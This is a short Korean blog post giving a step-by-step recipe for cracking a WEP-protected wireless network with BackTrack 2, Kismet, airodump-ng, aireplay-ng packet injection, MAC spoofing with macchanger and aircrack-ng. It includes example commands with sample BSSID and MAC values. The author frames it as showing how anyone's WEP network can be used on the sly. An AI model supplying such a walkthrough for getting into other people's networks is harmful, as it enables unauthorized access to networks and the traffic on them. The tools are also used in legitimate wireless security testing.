WEP Crack

이 문서를 보면 WEP Key를 쓴 무선네트워크는 얼마든지 슬그머니 쓸 수 있겠지 싶다.
보안에 취약하다고 들었지만, 이 정도로 쉬울줄이야..

개략적인 순서는 다음과 같다.

. backtrack2 iso 이미지를 다운 받아 CD로 굽는다.
. CD를 넣고 부팅한다. (Slackware live CD위에 필요한 도구를 넣은 linux 부팅시디)
. Kismet을 실행한다. 이러면 bssid, essid, channel # 를 얻을 수 있고, 무선랜카드를 monitor mode로 만든다.
. 그러면서 wifi0라는 virtual device가 만들어져 있을 건데, iwconfig로 확인가능하다.
. 암튼, Kismet 화면에 보면 signal 강도에 따라 차례로 나열되어 있을 텐데, 거기서 Flag가 Y인 것이 WEP을 쓰는 AP임. 대상 AP의 bssid, essid, channel# 를 잘 적어둔다.
. Kismet은 그대로 두고, airodump로 data를 수집한다.
. 이렇게, airodump-ng [dev_name] -w [saved_file] [channel#] 1
. usbdevice를 꼽으면 /mnt/ 밑에 생기니까 saved_file을 그쪽으로 지정해 두면 됨.
. 맨 마지막 인자 1 은 WEB key관계된 data만 저장하라는 얘기.
. 그 다음은 무선랜카드와 AP를 연결한다.
. aireplay-ng -1 0 -e [essid] -a [bssid] -h [my_macaddr] [dev_name]
. my_macaddr은 macchanger -s [dev_name] 으로 볼 수도 바꿀수도 있슴.
. 패킷을 넣어보자.
. aireplay-ng -3 -b [bssid] -h [my_macaddr] [dev_name]
. 이제 모인 패킷 분석.
. aircrack-ng -s [saved_file]

원문에 있는 예제만 적어보면, 순서대로
. kismet
. iwconfig
. airodump-ng ath0 -w /mnt/hda2/home/ryan/belkin_slax_rcu 9 1
. aireplay-ng -1 0 -e belkin -a 00:11:22:33:44:55 -h 00:fe:22:33:f4:e5 ath0
. aireplay-ng -3 -b 00:11:22:33:44:55 -h 00:fe:22:33:f4:e5 ath0
. aircrack-ng -s /mnt/hda2/home/belkin_slax_rcu-03.ivs

사용자 삽입 이미지